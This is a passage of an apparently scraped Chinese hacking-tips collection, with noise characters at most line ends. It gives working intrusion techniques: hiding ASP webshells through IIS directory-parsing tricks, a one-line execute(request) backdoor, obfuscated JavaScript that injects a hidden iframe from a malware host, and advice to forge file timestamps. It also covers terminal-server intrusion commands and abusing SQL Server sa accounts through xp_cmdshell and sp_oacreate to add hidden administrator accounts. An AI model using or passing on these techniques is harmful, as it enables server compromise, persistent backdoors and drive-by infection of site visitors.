, j( R( h+ Z) o1 Q9 z4 @4 T执行后可以用AT命令查看新加的任务
" C( w. Y7 Y# o/ P/ A% O用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
4 Z$ @4 y+ M8 L- a# L: ?9 Y% b* d6 H
53、隐藏ASP后门的两种方法6 z1 g$ u F+ T& v& }, }/ ~
1、建立非标准目录:mkdir images..\& m0 T) a$ `! R, U3 j1 ]
拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
z9 |; A) j/ t3 d$ G7 l% ^% N: t通过web访问ASP木马:http://ip/images../news.asp?action=login
) f( {2 U# t5 b ?6 I& Z如何删除非标准目录:rmdir images..\ /s; D$ N6 _$ Q1 F. X4 g
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:5 m1 B4 Z2 ?+ o6 K
mkdir programme.asp
9 F- P; F4 r% |! g* x0 @( O新建1.txt文件内容:<!--#include file=”12.jpg”-->- U* L: X: r d
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
N0 D Z# b1 S5 c% [/ c# ?( s1 sattrib +H +S programme.asp
5 A; ~1 d8 o6 A9 w通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt
" l, s( e* `4 Y2 t. Q! I4 C; C2 g' C4 j2 S! V- H
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。5 e. z' u- `; ~; p+ B
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。& u6 \" s( N, i5 c5 F- T; E3 w
7 }8 i+ q% i5 }) v55、JS隐蔽挂马1 L, k3 c+ V8 a$ V/ f( H$ _) o
1.( k! w% `1 U& R- o7 l x1 ?' D& `
var tr4c3="<iframe src=ht";6 E! f9 X9 m+ q# w
tr4c3 = tr4c3+"tp:/";( a, B/ J; N4 r9 @1 z q
tr4c3 = tr4c3+"/ww";: s) `$ D% C7 l4 p% T( S+ l \
tr4c3 = tr4c3+"w.tr4";; L( u- n6 @" x) e i$ [4 \2 l
tr4c3 = tr4c3+"c3.com/inc/m";
% y; d3 V7 s/ z( ztr4c3 = tr4c3+"m.htm style="display:none"></i";# \6 N7 s1 t' H
tr4c3 =tr4c3+"frame>'";* c' M% {8 b- j0 ^
document.write(tr4c3);
7 K: u- A( H4 ?, {4 {# G避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。; B1 s) ^& R2 P( C% o" ?+ F
6 K0 a* H: `0 L+ s1 c2.! C1 m) N* X# i: f- M d
转换进制,然后用EVAL执行。如
2 B( g0 B" Y. A! Teval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
/ q; s+ B4 p* m; N% F不过这个有点显眼。4 k1 i" d3 ~# D/ O. W! O a
3.$ E1 e- h0 c! @$ U6 p
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');, d& W7 Q d2 D- z, X' S. a9 J( b
最后一点,别忘了把文件的时间也修改下。
* k" P2 h- X/ y- c0 B, D8 }) d1 F7 y; `+ t$ ]
56.3389终端入侵常用DOS命令
' Z3 e; l. m# j6 U) f( rtaskkill taskkill /PID 1248 /t
# @% ^$ H& _; x: V: g0 W
/ O$ N: f+ k4 M \4 btasklist 查进程& B5 H* }" O- b8 L8 O0 S( S: |
0 z; h' Z& G+ N' h% `! h
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
0 `# p" {* \ x1 Viisreset /reboot
( n7 R6 x" I, {$ {$ Z. ktsshutdn /reboot /delay:1 重起服务器
0 `8 V4 E" G) k, d! [
$ \; U7 Z; H4 L, i8 `& M, Jlogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
- B2 Q! C; W4 c7 e8 K/ i% z% x& W; M6 l( v2 ]+ p, u/ N1 ^
query user 查看当前终端用户在线情况- @/ N/ A. L: }! ~
2 Q8 c$ e. H) ]& S' K, A要显示有关所有会话使用的进程的信息,请键入:query process *
, A& v! u4 H& S% \, K
& |( e: S2 s2 u0 j- x3 x要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2
8 c5 P: D9 g' O$ f4 R, ^: L) W6 M
; v. U, N2 X8 T: W q8 c1 J7 V要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2% v! y r) x/ f. z0 L
- _! G, T+ B4 ~- B, [; T( C- {/ L, C
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
( D# }/ A5 K9 U. D6 v) P3 d {# N/ k' @. A$ Z
命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
. Z$ O) f3 T! p V' Y. i9 s$ }
5 u* ^! \& Q% y2 ^. }9 O( ?命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
6 L* A: }. I: [
4 M% Y, v, @+ N! I" S2 s命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。: J. _. I2 d, K% }4 E5 A2 T. H
6 @3 n8 P$ t h
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机, S& U- ^. N$ C, z" l
2 ^! b' U% X1 G
56、在地址栏或按Ctrl+O,输入:% l s2 ^0 t, r/ [
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;# V- D' q+ g8 g8 w% k
0 q* ~+ Q: `5 g: ~% P. i# \
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# W, f! b n" |; U# S7 ?/ l: B; H$ w) i
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
# _# p$ Y8 B/ k9 K- z6 n9 n4 }用net localgroup administrators是可以看到管理组下,加了$的用户的。" Y* S3 n: g+ {1 k+ d" C8 K
. P7 x6 T/ U! ]5 G6 R# ^7 v" U- s. V, H* C58、 sa弱口令相关命令9 d$ h7 C9 U; u; M8 L- j) T
" J2 A0 ~: ], r# W
一.更改sa口令方法:0 {5 z& |' t! i2 R( B1 D3 f
用sql综合利用工具连接后,执行命令:
0 I5 C! g7 Y/ y# Dexec sp_password NULL,'20001001','sa'
4 g; R; o6 \) c(提示:慎用!)) o, }" \6 W6 \' @6 s: H& r2 F4 V
$ x( M2 I; f$ R. I* O7 ?' H
二.简单修补sa弱口令.
5 [7 a0 D$ M3 o/ C# s' N% }5 g3 o; V: d
方法1:查询分离器连接后执行:$ s! p. U: s% i6 ~ G
if exists (select * from
. x+ G0 y4 ?) |( u3 O l. e: [dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and0 A, ?/ a- @# O
OBJECTPROPERTY(id, N'IsExtendedProc') = 1)
( z" S0 S" r- b# ^
1 x& p! j4 q: H/ D0 s, R8 @exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'( }3 V! P/ _" G$ ^6 _0 F4 f5 k& K, P
9 i5 x, t' N6 RGO ?% ?' r# v3 z% r) C
* M7 ]: T! P) n8 H% _6 @
然后按F5键命令执行完毕
1 @% ]% C1 \1 T, v6 S* ^& ?
& @ h e" ?5 t+ Y' k, k方法2:查询分离器连接后' m9 {; Y2 s& b/ ]6 x0 H, r
第一步执行:use master2 x* z4 E5 d3 Q( q8 a$ i, U
第二步执行:sp_dropextendedproc 'xp_cmdshell'" e/ D# f9 ]8 t
然后按F5键命令执行完毕% s. j+ s1 v! v/ S$ W7 b
) j4 j+ c% J P4 r6 t$ h( u% X' b' m. N$ e( d# d( S
三.常见情况恢复执行xp_cmdshell./ \; a4 r: }8 V3 _$ g+ {
8 Q K# T1 e. e. P3 @
& s9 F! G! ^% Q% ~1 未能找到存储过程'master..xpcmdshell'.
0 O& C% b/ m% s1 c 恢复方法:查询分离器连接后,
4 E* N7 d T9 N7 }' ?第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
* \/ `6 }" c/ U# D/ X7 t' h第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
2 @; ]7 n/ q- d8 a然后按F5键命令执行完毕2 R5 J/ C5 c4 ]$ O3 q! C( }
+ u! v, O6 w; g% o/ H" ]+ D/ t2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
5 z0 F5 a4 f- L( \9 l% B- _恢复方法:查询分离器连接后,
- U; g6 J4 K1 w n3 Y, Y第一步执行:sp_dropextendedproc "xp_cmdshell"- Y7 r, ~7 O2 S+ `9 n
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
6 z$ E: p8 W; M: ~0 l) n$ T9 h然后按F5键命令执行完毕& ]3 g% |6 G, K1 d
! n% T& f& I" a" B, E$ [
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)- P* `4 ~( g1 a, X8 i% V4 V
恢复方法:查询分离器连接后,$ J6 I% L7 o( ]; w
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
8 V% v6 a, s* J* f/ e, Q第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll' . r5 R+ G4 p; j. S/ n( g
然后按F5键命令执行完毕
% W; F6 r+ Y9 H# N/ A0 u" |, N3 V/ k: P& ~% R$ d7 Y( r
四.终极方法." ]) S: j: T! N r
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
* z7 B6 c& D. Q+ t- s查询分离器连接后,- }5 T- l' n C1 f$ E5 ] @
2000servser系统:3 ^/ B. O! Q v! N. a" m
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
! O$ M0 s2 Q2 v, u; c& x, j! d: j( N* W+ L/ C' {- `: N( C) i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
& V% ^% e" c' ^$ }/ T# W/ s/ ~ T6 a0 P. s3 C7 v% x K4 Y$ k
xp或2003server系统:( {9 P0 G ~6 a
) K* P1 B0 T* ]) B' Odeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'" D+ u) W* B5 g# h# c
5 }1 ~' W2 b- _" G5 A" fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'0 s. C8 Q, w6 S: j9 [
|